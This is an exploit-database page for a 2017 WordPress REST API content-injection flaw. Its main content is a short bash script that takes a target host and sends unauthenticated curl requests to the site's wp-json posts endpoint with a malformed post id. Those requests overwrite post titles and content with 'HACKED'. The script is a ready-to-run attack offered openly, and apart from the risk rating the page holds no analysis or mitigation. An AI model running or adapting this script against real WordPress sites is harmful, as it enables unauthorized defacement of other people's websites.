WordPress wp-json Content Injection

2017.02.09
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/bin/bash #Wordpress wp_Json API exploit #Larry W. Cashdollar #Discovered by Marc Montipas #http://www.vapidlabs.com/exploits/wordpress_exploit.sh.txt #https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html?utm_campaign=wp472vuln #Usage ./exp.sh target 1 or 2 if [ $2 == 2 ] then curl -s --url "http://$1/index.php/wp-json/wp/v2/posts/12345?id=1T" --data 'title=HACKED&content=HACKED' | indent fi if [ $2 == 1 ] then curl -s -X POST --url "http://$1/index.php/wp-json/wp/v2/posts/5" --data '{"id":"1k","title":"11Hacked1","content":"11Hacked1"}' -H 'Content-Type: application/json'| indent fi


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top